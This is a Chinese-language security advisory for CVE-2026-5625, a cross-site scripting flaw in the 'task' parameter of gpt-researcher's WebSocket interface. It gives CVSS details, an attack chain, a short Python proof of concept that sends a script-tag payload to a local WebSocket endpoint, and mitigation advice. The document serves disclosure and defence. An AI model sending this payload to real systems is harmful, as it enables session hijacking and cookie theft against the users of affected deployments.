CVE-2026-5625 gpt-researcher WebSocket接口存在XSS漏洞

漏洞信息

漏洞编号

CVE-2026-5625

漏洞类型

跨站脚本 (XSS)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

assafelovic gpt-researcher

漏洞概述

assafelovic gpt-researcher 3.4.3及之前版本存在安全漏洞。该漏洞源于WebSocket接口组件中文件gpt_researcher/skills/researcher.py对参数“task”的处理不当。攻击者可以通过操纵该参数发起跨站脚本攻击（XSS）。由于攻击可远程进行且无需认证，但需要用户交互，该漏洞对系统完整性构成中等风险。目前漏洞利用代码已公开，厂商尚未修复。

技术细节

该漏洞位于gpt-researcher的WebSocket接口处理逻辑中，具体涉及文件`gpt_researcher/skills/researcher.py`。在处理WebSocket连接传入的参数时，程序未对`task`参数进行充分的输入验证和过滤，直接将其传递给了后续的处理流程。攻击者可以构造包含恶意JavaScript代码的`task`参数值，并通过WebSocket发送给服务器。由于缺乏适当的输出编码，当受害者（通常是管理员或使用该Web界面的用户）查看相关数据或触发特定操作时，这段恶意代码将在受害者的浏览器上下文中执行。攻击者利用此漏洞可窃取用户Session、劫持用户会话或执行未授权操作。CVSS向量显示该攻击无需认证但需要用户交互（如点击链接），符合反射型XSS的特征。

攻击链分析

STEP 1

侦察

攻击者发现目标系统使用了存在漏洞的gpt-researcher版本，并确认WebSocket接口端点。

STEP 2

武器化

攻击者构造包含恶意JavaScript代码的载荷，并将其嵌入到WebSocket消息的'task'参数中。

STEP 3

传递

攻击者诱导受害者访问特定页面，或通过脚本直接向目标服务器的WebSocket接口发送恶意消息。

STEP 4

利用

受害者的浏览器接收到未经过滤的WebSocket数据并在DOM中渲染，导致恶意脚本执行。

STEP 5

达成目标

恶意代码执行，可能导致Cookie窃取、会话劫持或其他客户端攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
import websockets
import json

async def exploit_xss(target_uri):
    # Construct malicious payload
    # Note: Adjust the payload based on actual reflection point
    xss_payload = '<script>alert("CVE-2026-5625")</script>'

    # WebSocket message structure
    message = {
        "task": xss_payload,
        "report_type": "research_report" # Example parameter
    }

    try:
        async with websockets.connect(target_uri) as websocket:
            print(f"[*] Connecting to {target_uri}...")
            # Send malicious payload
            await websocket.send(json.dumps(message))
            print("[+] Payload sent successfully.")
            print(f"[*] Payload: {xss_payload}")

            # Listen for response (optional)
            response = await websocket.recv()
            print(f"[*] Server response: {response}")

    except Exception as e:
        print(f"[-] Error: {e}")

# Usage
# Replace with actual target WebSocket URL
target = "ws://localhost:8000/ws/researcher"
asyncio.run(exploit_xss(target))

影响范围

assafelovic gpt-researcher <= 3.4.3

防御指南

临时缓解措施

建议立即限制对WebSocket接口的外网访问，仅在受信任的内网环境中使用。在代码层面，开发者应在`gpt_researcher/skills/researcher.py`文件中添加对`task`参数的HTML实体编码处理，确保特殊字符（如<, >, &, ", '）被转义，防止脚本注入。同时，用户应谨慎点击不明链接，避免在处理敏感信息时使用该受影响版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5625
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5625
3 Details https://www.cvedetails.com/cve/CVE-2026-5625/
4 VulDB https://vuldb.com/cve/CVE-2026-5625
5 Link https://github.com/assafelovic/gpt-researcher/
6 Link https://github.com/assafelovic/gpt-researcher/issues/1692
7 Link https://vuldb.com/submit/785832
8 Link https://vuldb.com/vuln/355415
9 Link https://vuldb.com/vuln/355415/cti